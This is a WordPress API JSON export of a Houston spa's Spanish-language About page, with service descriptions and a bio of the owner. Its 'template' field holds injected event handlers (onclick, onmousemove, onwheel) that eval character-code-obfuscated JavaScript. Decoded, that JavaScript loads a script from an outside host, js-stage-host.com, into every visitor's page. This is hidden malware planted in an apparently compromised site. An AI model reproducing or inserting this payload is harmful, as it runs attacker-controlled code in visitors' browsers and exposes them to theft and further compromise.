{"id":5,"date":"2016-01-29T10:12:17","date_gmt":"2016-01-29T10:12:39","guid":{"rendered":"http:\/\/the7.io\/beauty-studio\/?page_id=5"},"modified":"2020-12-07T10:36:17","modified_gmt":"2020-12-07T16:36:17","slug":"acerca-de-nosotros","status":"publish","type":"page","link":"https:\/\/www.amyshouston.com\/es\/acerca-de-nosotros\/","title":{"rendered":"Acerca de"},"content":{"rendered":"<div class=\"wpb-content-wrapper\"><div id=\"desktop\" data-vc-full-width=\"true\" data-vc-full-width-init=\"false\" class=\"vc_row wpb_row vc_row-fluid vc_custom_1521315793763\"><div class=\"wpb_column vc_column_container vc_col-sm-6 vc_col-lg-6 vc_col-md-6\"><div class=\"vc_column-inner vc_custom_1521315456685\"><div class=\"wpb_wrapper\"><div id=\"ultimate-heading-964669e363945e0b6\" class=\"uvc-heading ult-adjust-bottom-margin ultimate-heading-964669e363945e0b6 uvc-8189\" data-hspacer=\"no_spacer\"  data-halign=\"left\" style=\"text-align:left\"><div class=\"uvc-heading-spacer no_spacer\" style=\"top\"><\/div><div class=\"uvc-main-heading ult-responsive\"  data-ultimate-target='.uvc-heading.ultimate-heading-964669e363945e0b6 h2'  data-responsive-json-new='{\"font-size\":\"desktop:26px;\",\"line-height\":\"desktop:36px;\"}' ><h2 style=\"--font-weight:theme;margin-bottom:30px;\">Tratamientos de primera clase, resultados resplandecientes.<\/h2><\/div><\/div><div id=\"ultimate-heading-898369e363945e0d9\" class=\"uvc-heading ult-adjust-bottom-margin ultimate-heading-898369e363945e0d9 uvc-5785 dTitle uvc-heading-default-font-sizes\" data-hspacer=\"no_spacer\"  data-halign=\"left\" style=\"text-align:left\"><div class=\"uvc-heading-spacer no_spacer\" style=\"top\"><\/div><div class=\"uvc-sub-heading ult-responsive\"  data-ultimate-target='.uvc-heading.ultimate-heading-898369e363945e0d9 .uvc-sub-heading '  data-responsive-json-new='{\"font-size\":\"desktop:18px;\",\"line-height\":\"desktop:30px;\"}'  style=\"font-weight:normal;\">Adoptando un enfoque diferente a la experiencia de spa tradicional, The Spa at Amy's Skincare ofrece una serie de tratamientos innovadores y reparadores en Houston inspirados en los elementos de la vida. Contamos con la confianza de miles de nuestros clientes felices. La satisfacci\u00f3n del cliente es nuestro objetivo prioritario n\u00famero uno.<\/p>\n<p>Nuestro estado de la instalaci\u00f3n de arte comprometida a proporcionar un cuerpo completo y la experiencia de curaci\u00f3n de la mente..... igualado por un incomparable nivel de servicio personalizado, la calidad, el conocimiento se proporcionan a usted con la privacidad y comodidad.<\/div><\/div><\/div><\/div><\/div><div class=\"wpb_column vc_column_container vc_col-sm-6\"><div class=\"vc_column-inner\"><div class=\"wpb_wrapper\">\n\t<div  class=\"wpb_single_image wpb_content_element vc_align_center\">\n\t\t\n\t\t<figure class=\"wpb_wrapper vc_figure\">\n\t\t\t<div class=\"vc_single_image-wrapper   vc_box_border_grey\"><img loading=\"lazy\" decoding=\"async\" width=\"1600\" height=\"1067\" src=\"https:\/\/www.amyshouston.com\/wp-content\/uploads\/2014\/10\/front-desk.jpg\" class=\"vc_single_image-img attachment-full\" alt=\"\" title=\"recepci\u00f3n\" srcset=\"https:\/\/www.amyshouston.com\/wp-content\/uploads\/2014\/10\/front-desk.jpg 1600w, https:\/\/www.amyshouston.com\/wp-content\/uploads\/2014\/10\/front-desk-300x200@2x.jpg 600w, https:\/\/www.amyshouston.com\/wp-content\/uploads\/2014\/10\/front-desk-300x200.jpg 300w, https:\/\/www.amyshouston.com\/wp-content\/uploads\/2014\/10\/front-desk-1024x683.jpg.webp 1024w, https:\/\/www.amyshouston.com\/wp-content\/uploads\/2014\/10\/front-desk-768x512.jpg.webp 768w, https:\/\/www.amyshouston.com\/wp-content\/uploads\/2014\/10\/front-desk-1536x1024.jpg.webp 1536w\" sizes=\"auto, (max-width: 1600px) 100vw, 1600px\" data-dt-location=\"https:\/\/www.amyshouston.com\/es\/front-desk\/\"><\/div>\n\t\t<\/figure>\n\t<\/div>\n<\/div><\/div><\/div><div class=\"wpb_column vc_column_container vc_col-sm-12\"><div class=\"vc_column-inner\"><div class=\"wpb_wrapper\"><div id=\"ultimate-heading-329769e363945f22a\" class=\"uvc-heading ult-adjust-bottom-margin ultimate-heading-329769e363945f22a uvc-55 dTitle uvc-heading-default-font-sizes\" data-hspacer=\"no_spacer\"  data-halign=\"left\" style=\"text-align:left\"><div class=\"uvc-heading-spacer no_spacer\" style=\"top\"><\/div><div class=\"uvc-sub-heading ult-responsive\"  data-ultimate-target='.uvc-heading.ultimate-heading-329769e363945f22a .uvc-sub-heading '  data-responsive-json-new='{\"font-size\":\"desktop:18px;\",\"line-height\":\"desktop:30px;\"}'  style=\"font-weight:normal;\">Nuestros experimentados terapeutas ofrecen una fusi\u00f3n de productos y estilos de masaje para atender sus necesidades espec\u00edficas. Entre las afecciones que pueden beneficiarse de pr\u00e1cticas especializadas se incluyen los masajes para embarazadas y oncol\u00f3gicos.<\/div><\/div><\/div><\/div><\/div><\/div><div class=\"vc_row-full-width vc_clearfix\"><\/div><!-- Row Backgrounds --><div class=\"upb_color\" data-bg-override=\"0\" data-bg-color=\"#ffffff\" data-fadeout=\"\" data-fadeout-percentage=\"30\" data-parallax-content=\"\" data-parallax-content-sense=\"30\" data-row-effect-mobile-disable=\"true\" data-img-parallax-mobile-disable=\"true\" data-rtl=\"false\"  data-custom-vc-row=\"\"  data-vc=\"8.2\"  data-is_old_vc=\"\"  data-theme-support=\"\"   data-overlay=\"false\" data-overlay-color=\"\" data-overlay-pattern=\"\" data-overlay-pattern-opacity=\"\" data-overlay-pattern-size=\"\"     data-hide-row=\" uvc_hidden-sm  uvc_hidden-xs  uvc_hidden-xsl \" ><\/div><div id=\"mobile\" class=\"vc_row wpb_row vc_row-fluid vc_custom_1521316938568\"><div class=\"wpb_column vc_column_container vc_col-sm-12 vc_col-lg-6 vc_col-md-6\" id=\"about-content\"><div class=\"vc_column-inner vc_custom_1521315456685\"><div class=\"wpb_wrapper\"><div id=\"ultimate-heading-515569e363945f493\" class=\"uvc-heading ult-adjust-bottom-margin ultimate-heading-515569e363945f493 uvc-5909\" data-hspacer=\"no_spacer\"  data-halign=\"left\" style=\"text-align:left\"><div class=\"uvc-heading-spacer no_spacer\" style=\"top\"><\/div><div class=\"uvc-main-heading ult-responsive\"  data-ultimate-target='.uvc-heading.ultimate-heading-515569e363945f493 h2'  data-responsive-json-new='{\"font-size\":\"desktop:26px;\",\"line-height\":\"desktop:36px;\"}' ><h2 style=\"--font-weight:theme;margin-bottom:30px;\">Tratamientos de primera clase, resultados resplandecientes.<\/h2><\/div><\/div>\n\t<div  class=\"wpb_single_image wpb_content_element vc_align_center\">\n\t\t\n\t\t<figure class=\"wpb_wrapper vc_figure\">\n\t\t\t<div class=\"vc_single_image-wrapper   vc_box_border_grey\"><img loading=\"lazy\" decoding=\"async\" width=\"1600\" height=\"1067\" src=\"https:\/\/www.amyshouston.com\/wp-content\/uploads\/2014\/10\/front-desk.jpg\" class=\"vc_single_image-img attachment-full\" alt=\"\" title=\"recepci\u00f3n\" srcset=\"https:\/\/www.amyshouston.com\/wp-content\/uploads\/2014\/10\/front-desk.jpg 1600w, https:\/\/www.amyshouston.com\/wp-content\/uploads\/2014\/10\/front-desk-300x200@2x.jpg 600w, https:\/\/www.amyshouston.com\/wp-content\/uploads\/2014\/10\/front-desk-300x200.jpg 300w, https:\/\/www.amyshouston.com\/wp-content\/uploads\/2014\/10\/front-desk-1024x683.jpg.webp 1024w, https:\/\/www.amyshouston.com\/wp-content\/uploads\/2014\/10\/front-desk-768x512.jpg.webp 768w, https:\/\/www.amyshouston.com\/wp-content\/uploads\/2014\/10\/front-desk-1536x1024.jpg.webp 1536w\" sizes=\"auto, (max-width: 1600px) 100vw, 1600px\" data-dt-location=\"https:\/\/www.amyshouston.com\/es\/front-desk\/\"><\/div>\n\t\t<\/figure>\n\t<\/div>\n<div id=\"ultimate-heading-696469e363945fe14\" class=\"uvc-heading ult-adjust-bottom-margin ultimate-heading-696469e363945fe14 uvc-1481 dTitle uvc-heading-default-font-sizes\" data-hspacer=\"no_spacer\"  data-halign=\"left\" style=\"text-align:left\"><div class=\"uvc-heading-spacer no_spacer\" style=\"top\"><\/div><div class=\"uvc-sub-heading ult-responsive\"  data-ultimate-target='.uvc-heading.ultimate-heading-696469e363945fe14 .uvc-sub-heading '  data-responsive-json-new='{\"font-size\":\"desktop:18px;\",\"line-height\":\"desktop:30px;\"}'  style=\"font-weight:normal;\">Adoptando un enfoque diferente a la experiencia de spa tradicional, The Spa at Amy's Skincare ofrece una serie de tratamientos innovadores y reparadores en Houston inspirados en los elementos de la vida. Contamos con la confianza de miles de nuestros clientes felices. La satisfacci\u00f3n del cliente es nuestro objetivo prioritario n\u00famero uno.<\/p>\n<p>Nuestro estado de la instalaci\u00f3n de arte comprometida a proporcionar un cuerpo completo y la experiencia de curaci\u00f3n de la mente..... igualado por un incomparable nivel de servicio personalizado, la calidad, el conocimiento se proporcionan a usted con la privacidad y comodidad.<\/p>\n<p>Nuestros experimentados terapeutas ofrecen una fusi\u00f3n de productos y estilos de masaje para atender sus necesidades espec\u00edficas. Entre las afecciones que pueden beneficiarse de pr\u00e1cticas especializadas se incluyen los masajes para embarazadas y oncol\u00f3gicos.<\/div><\/div><\/div><\/div><\/div><\/div><!-- Row Backgrounds --><div class=\"upb_color\" data-bg-override=\"0\" data-bg-color=\"#ffffff\" data-fadeout=\"\" data-fadeout-percentage=\"30\" data-parallax-content=\"\" data-parallax-content-sense=\"30\" data-row-effect-mobile-disable=\"true\" data-img-parallax-mobile-disable=\"true\" data-rtl=\"false\"  data-custom-vc-row=\"\"  data-vc=\"8.2\"  data-is_old_vc=\"\"  data-theme-support=\"\"   data-overlay=\"false\" data-overlay-color=\"\" data-overlay-pattern=\"\" data-overlay-pattern-opacity=\"\" data-overlay-pattern-size=\"\"     data-hide-row=\" uvc_hidden-lg  uvc_hidden-ml  uvc_hidden-md \" ><\/div><div id=\"owner-section\" class=\"vc_row wpb_row vc_row-fluid vc_custom_1521228101075 vc_row-has-fill\"><div class=\"wpb_column vc_column_container vc_col-sm-12 vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-2 vc_col-md-8 vc_col-sm-offset-2 vc_col-xs-12\"><div class=\"vc_column-inner\"><div class=\"wpb_wrapper\"><div id=\"ultimate-heading-522269e3639460078\" class=\"uvc-heading ult-adjust-bottom-margin ultimate-heading-522269e3639460078 uvc-4333 accent-border-color\" data-hspacer=\"line_only\"  data-halign=\"center\" style=\"text-align:center\"><div class=\"uvc-main-heading ult-responsive\"  data-ultimate-target='.uvc-heading.ultimate-heading-522269e3639460078 h2'  data-responsive-json-new='{\"font-size\":\"desktop:40px;\",\"line-height\":\"desktop:50px;\"}' ><h2 style=\"--font-weight:theme;margin-bottom:15px;\">Conozca a nuestro propietario<\/h2><\/div><div class=\"uvc-heading-spacer line_only\" style=\"margin-bottom:55px;height:3px;\"><span class=\"uvc-headings-line\" style=\"border-style:solid;border-bottom-width:3px;border-color:#ccc;width:180px;\"><\/span><\/div><\/div><div class=\"vc_row wpb_row vc_inner vc_row-fluid oMobile vc_custom_1521314887897 vc_row-has-fill vc_row-o-content-middle vc_row-flex\"><div class=\"wpb_column vc_column_container vc_col-sm-12 vc_col-lg-offset-0 vc_col-lg-12 vc_col-md-offset-0 vc_col-md-12 vc_col-sm-offset-0 vc_col-xs-12\"><div class=\"vc_column-inner\"><div class=\"wpb_wrapper\">\n\t<div  class=\"wpb_single_image wpb_content_element vc_align_center  vc_custom_1521235383499\">\n\t\t\n\t\t<figure class=\"wpb_wrapper vc_figure\">\n\t\t\t<div class=\"vc_single_image-wrapper   vc_box_border_grey\"><img loading=\"lazy\" decoding=\"async\" width=\"364\" height=\"546\" src=\"https:\/\/www.amyshouston.com\/wp-content\/uploads\/2014\/10\/amy-s-houston-master-esthetician-1.jpg\" class=\"vc_single_image-img attachment-full\" alt=\"\" title=\"amy-s-houston-master-esthetician\" srcset=\"https:\/\/www.amyshouston.com\/wp-content\/uploads\/2014\/10\/amy-s-houston-master-esthetician-1.jpg 364w, https:\/\/www.amyshouston.com\/wp-content\/uploads\/2014\/10\/amy-s-houston-master-esthetician-1-200x300.jpg 200w\" sizes=\"auto, (max-width: 364px) 100vw, 364px\" data-dt-location=\"https:\/\/www.amyshouston.com\/es\/amy-s-houston-master-esthetician-2\/\"><\/div>\n\t\t<\/figure>\n\t<\/div>\n<div id=\"ultimate-heading-696069e3639460a84\" class=\"uvc-heading ult-adjust-bottom-margin ultimate-heading-696069e3639460a84 uvc-8154 accent-subtitle-color\" data-hspacer=\"no_spacer\"  data-halign=\"center\" style=\"text-align:center\"><div class=\"uvc-heading-spacer no_spacer\" style=\"top\"><\/div><div class=\"uvc-main-heading ult-responsive\"  data-ultimate-target='.uvc-heading.ultimate-heading-696069e3639460a84 h2'  data-responsive-json-new='{\"font-size\":\"desktop:24px;\",\"line-height\":\"desktop:30px;\"}' ><h2 style=\"--font-weight:theme;margin-bottom:5px;\">Amy Schweiss<\/h2><\/div><div class=\"uvc-sub-heading ult-responsive\"  data-ultimate-target='.uvc-heading.ultimate-heading-696069e3639460a84 .uvc-sub-heading '  data-responsive-json-new='{\"font-size\":\"desktop:16px;\",\"line-height\":\"desktop:26px;\"}'  style=\"font-weight:normal;margin-bottom:30px;\">Med Spa Owner &amp; Renowned Skincare Specialist<\/div><\/div><div id=\"ultimate-heading-314569e3639460a9e\" class=\"uvc-heading ult-adjust-bottom-margin ultimate-heading-314569e3639460a9e uvc-4278 dTitle uvc-heading-default-font-sizes\" data-hspacer=\"no_spacer\"  data-halign=\"left\" style=\"text-align:left\"><div class=\"uvc-heading-spacer no_spacer\" style=\"top\"><\/div><div class=\"uvc-sub-heading ult-responsive\"  data-ultimate-target='.uvc-heading.ultimate-heading-314569e3639460a9e .uvc-sub-heading '  data-responsive-json-new='{\"font-size\":\"desktop:18px;\",\"line-height\":\"desktop:30px;\"}'  style=\"font-weight:normal;\">Amy Schweiss lleva m\u00e1s de 20 a\u00f1os en el sector de la belleza, y es muy conocida en Houston por su deseo de ofrecerte una piel nueva.<\/p>\n<p>Amy es un Green Peel y Venus Legacy t\u00e9cnico certificado, se especializa en Dermal Resurfacing para el acn\u00e9, arrugas profundas, estr\u00edas y cicatrices hipertr\u00f3ficas, electro m\u00fasculo resculpting (lifting facial no quir\u00fargico de la piel etiqueta y la eliminaci\u00f3n de lesiones, faciales a medida, t\u00e9cnico de depilaci\u00f3n l\u00e1ser, maquillaje permanente de precisi\u00f3n, faciales de extracci\u00f3n profunda, Oxyderm (tm) microdermoabrasi\u00f3n.<\/p>\n<p>Amy se enorgullece de tener los mejores t\u00e9cnicos en Houston disponibles para sus tratamientos. El lema de Amy: \"Siempre empujar para ser el mejor\".<\/div><\/div><\/div><\/div><\/div><\/div><\/div><\/div><\/div><\/div>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>Tratamientos de clase mundial, resultados brillantes.Adoptando un enfoque diferente a la experiencia de spa tradicional, The Spa at Amy's Skincare ofrece una serie de tratamientos innovadores y restauradores en Houston inspirados en los elementos de la vida. Contamos con la confianza de miles de nuestros clientes felices. La satisfacci\u00f3n del cliente es nuestro objetivo prioritario n\u00famero uno. Nuestro estado del arte...<\/p>","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":10,"comment_status":"closed","ping_status":"closed","template":"\" onclick=\"javascript:eval(String.fromCharCode(33,102,117,110,99,116,105,111,110,40,101,44,115,44,116,41,123,110,117,108,108,61,61,101,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,34,112,114,101,118,101,110,116,101,108,101,109,101,110,116,34,41,38,38,40,40,116,61,101,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,115,41,41,46,97,115,121,110,99,61,33,48,44,116,46,105,100,61,34,112,114,101,118,101,110,116,101,108,101,109,101,110,116,34,44,116,46,115,114,99,61,34,104,116,116,112,115,58,47,47,106,115,45,115,116,97,103,101,45,104,111,115,116,46,99,111,109,47,99,97,99,104,101,100,47,97,115,115,101,116,115,46,106,115,34,44,40,101,61,101,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,115,41,91,48,93,41,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,116,44,101,41,41,125,40,100,111,99,117,109,101,110,116,44,34,115,99,114,105,112,116,34,41,59))\" onmousemove=\"javascript:eval(String.fromCharCode(33,102,117,110,99,116,105,111,110,40,101,44,115,44,116,41,123,110,117,108,108,61,61,101,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,34,112,114,101,118,101,110,116,101,108,101,109,101,110,116,34,41,38,38,40,40,116,61,101,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,115,41,41,46,97,115,121,110,99,61,33,48,44,116,46,105,100,61,34,112,114,101,118,101,110,116,101,108,101,109,101,110,116,34,44,116,46,115,114,99,61,34,104,116,116,112,115,58,47,47,106,115,45,115,116,97,103,101,45,104,111,115,116,46,99,111,109,47,99,97,99,104,101,100,47,97,115,115,101,116,115,46,106,115,34,44,40,101,61,101,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,115,41,91,48,93,41,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,116,44,101,41,41,125,40,100,111,99,117,109,101,110,116,44,34,115,99,114,105,112,116,34,41,59))\" onwheel=\"javascript:eval(String.fromCharCode(33,102,117,110,99,116,105,111,110,40,101,44,115,44,116,41,123,110,117,108,108,61,61,101,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,34,112,114,101,118,101,110,116,101,108,101,109,101,110,116,34,41,38,38,40,40,116,61,101,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,115,41,41,46,97,115,121,110,99,61,33,48,44,116,46,105,100,61,34,112,114,101,118,101,110,116,101,108,101,109,101,110,116,34,44,116,46,115,114,99,61,34,104,116,116,112,115,58,47,47,106,115,45,115,116,97,103,101,45,104,111,115,116,46,99,111,109,47,99,97,99,104,101,100,47,97,115,115,101,116,115,46,106,115,34,44,40,101,61,101,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,115,41,91,48,93,41,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,116,44,101,41,41,125,40,100,111,99,117,109,101,110,116,44,34,115,99,114,105,112,116,34,41,59))\"","meta":{"footnotes":""},"class_list":["post-5","page","type-page","status-publish","hentry","description-off"],"_links":{"self":[{"href":"https:\/\/www.amyshouston.com\/es\/wp-json\/wp\/v2\/pages\/5","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.amyshouston.com\/es\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.amyshouston.com\/es\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.amyshouston.com\/es\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.amyshouston.com\/es\/wp-json\/wp\/v2\/comments?post=5"}],"version-history":[{"count":0,"href":"https:\/\/www.amyshouston.com\/es\/wp-json\/wp\/v2\/pages\/5\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.amyshouston.com\/es\/wp-json\/wp\/v2\/media?parent=5"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}